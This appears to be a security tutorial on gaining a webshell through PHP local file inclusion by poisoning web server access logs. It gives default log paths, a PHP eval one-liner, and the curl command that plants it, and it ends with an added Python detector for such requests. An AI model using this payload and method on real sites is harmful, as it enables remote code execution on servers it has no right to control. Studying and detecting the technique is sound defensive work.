Getting a shell by including log files

Source: Internet
Author: User
Tags: curl

I. Overview of the exploit

When there is no upload point and remote includes are not available (allow_url_include is off), a file inclusion vulnerability can still be turned into a shell by including the server's own log files. The idea is simple: every request we make to the site is recorded in the web server's log, so a request whose URL carries a PHP one-liner webshell is recorded there as well. Once the location of the log file on the server is known, including that file through the vulnerability executes the PHP recorded in it and gives us a shell. The most critical part of the whole "include log file" exploit is therefore finding the physical storage path of the log; once that path is known, everything else follows step by step.
II. Conditions for exploiting the vulnerability

(1) The physical storage path of the log file is known.
(2) A file inclusion vulnerability exists.
(3) A tool that sends the request without URL-encoding it: the curl command-line URL request tool, or the Burp Suite proxy.
III. Finding the log storage path

a) Default log paths
(1) Apache + Linux: /etc/httpd/logs/access_log or /var/log/httpd/access_log
(2) Apache + Windows 2003 (XAMPP): D:\xampp\apache\logs\access.log and D:\xampp\apache\logs\error.log
(3) IIS 6.0 + Windows 2003: C:\WINDOWS\system32\Logfiles
(4) IIS 7.0 + Windows 2003: %systemdrive%\inetpub\logs\logfiles
(5) nginx: the logs directory under the installation directory; for example, with an installation path of /usr/local/nginx the log directory is /usr/local/nginx/logs

b) Default web middleware configuration files (these record the configured log path)
(1) Apache + Linux: /etc/httpd/conf/httpd.conf, or include the init script, e.g. index.php?page=/etc/init.d/httpd
(2) IIS 6.0 + Windows 2003: c:/windows/system32/inetsrv/metabase.xml
(3) IIS 7.0 + Windows: C:\Windows\system32\inetsrv\config\applicationhost.config
IV. Practice test records

a) Tool preparation
(1) curl command-line URL access tool, or
(2) Burp Suite proxy tool

b) Writing the one-liner to the log directly from the browser: test record
(1) Constructing the request in the browser. First, we use the browser directly to request a URL that carries the PHP one-liner, so that the server automatically records this request in its log file. The constructed URL:
    http://127.0.0.1/php/1.php?page=<?php @eval($_POST[123]);?>
(2) Test result: failure. Including the server log file through the file inclusion vulnerability did not execute the constructed PHP one-liner. Inspecting the log file showed that the characters of the one-liner had been encoded before being written, so PHP could not parse them; see "Failure reason analysis" below.
(3) Failure reason analysis. The idea of writing a one-liner to the log file is that the browser requests a resource whose URL contains the one-liner, the request fails, and the server automatically logs the request. In the actual test, however, the request written to the log file had been URL-encoded. The log file contained:
    http://127.0.0.1/php/1.php?%3c?php%20@eval($_POST[123]);?%3e
    "<"  ---->  the less-than sign is encoded as %3C
    ">"  ---->  the greater-than sign is encoded as %3E
    " "  ---->  the space is encoded as %20
    The one-liner as finally written to the log file is therefore %3c?php%20@eval($_POST[123]);?%3e.
(4) Failure summary. When the PHP one-liner is constructed directly in the browser, its special characters are automatically URL-escaped by the browser, so the one-liner written to the log file contains these encoded sequences, and PHP does not parse the encoded form.
c) Writing the one-liner to the log with curl: test record
(1) Constructing the request with curl. The command used:
    d:\curl>curl -v "http://127.0.0.1/php/1.php?page=<?php @eval($_POST\[123\]);?>"
    Two points need attention when constructing the request with curl:
    1) The requested URL must be enclosed in double quotation marks, otherwise curl reports an error;
    2) The square brackets [] in the PHP one-liner are special characters to curl (URL globbing) and must be escaped as \[ \], otherwise curl reports an error.
(2) Test result: success.
(3) Reason for success. Unlike the browser, the curl command-line tool does not URL-encode the special characters of the request, so the PHP one-liner is written to the server log file intact. Including the local server log file through the file inclusion vulnerability then parses the PHP one-liner webshell carried in the log.

d) Writing the one-liner to the log with the Burp Suite proxy: test record
(1) Capture the browser's request with the Burp Suite proxy, replace the browser-encoded characters with their original form, and forward the request so that the correct PHP one-liner is written to the server log file.
(2) Test result: success. Accessing the server log file directly through the file inclusion vulnerability showed that the one-liner was executed.
(3) Reason for success. Modifying the browser's encoded characters in Burp Suite records the one-liner in the log file in its original format, which PHP parses normally.
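From the defender's side, both halves of the technique above leave traces in the access log: a request line carrying a PHP open tag (raw, as curl or Burp send it, or %-encoded, as the browser sends it), and an include parameter pointing at one of the log or configuration paths listed in section III. The following detector is an added example, not part of the original article; the log lines are constructed in Apache combined format and the path list is taken from section III.

```python
import re
from urllib.parse import unquote

# Request target of an Apache/nginx combined-format entry; non-greedy so a
# raw, unencoded one-liner containing spaces is still captured whole.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>[^"]*?)(?: HTTP/[\d.]+)?"')
PHP_TAG_RE = re.compile(r"<\?(php|=)")

# Log and config locations from section III (lower-case, forward slashes).
SENSITIVE_PATHS = (
    "/etc/httpd/logs/access_log", "/var/log/httpd/access_log",
    "/usr/local/nginx/logs", "/etc/httpd/conf/httpd.conf", "/etc/init.d/httpd",
    "xampp/apache/logs", "system32/logfiles", "inetpub/logs/logfiles",
    "inetsrv/metabase.xml", "inetsrv/config/applicationhost.config",
)


def classify(line):
    """Return the findings for one access-log line (empty list if benign)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # Decode twice (browsers encode once, some tools double-encode), then
    # normalise case and path separators so Windows paths match too.
    decoded = unquote(unquote(m.group("target"))).replace("\\", "/").lower()
    findings = []
    if PHP_TAG_RE.search(decoded):
        findings.append("php-tag-in-request")      # log poisoning attempt
    if any(p in decoded for p in SENSITIVE_PATHS):
        findings.append("log-or-config-include")  # inclusion attempt
    return findings


def scan(lines):
    """Map each suspicious line number (1-based) to its findings."""
    return {i: f for i, l in enumerate(lines, 1) if (f := classify(l))}


# Constructed sample log: a benign hit, the browser-encoded and the raw
# poisoning requests from section IV, and the follow-up log inclusion.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /php/index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /php/1.php?page=%3C?php%20@eval($_POST[123]);?%3E HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /php/1.php?page=<?php @eval($_POST[123]);?> HTTP/1.1" 404 210 "-" "curl/7.68.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /php/1.php?page=/var/log/httpd/access_log HTTP/1.1" 200 9876 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(f)}")
```

A hit on both findings from the same client in quick succession is the strongest signal; the encoded form alone shows the attempt even when the payload never parsed.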
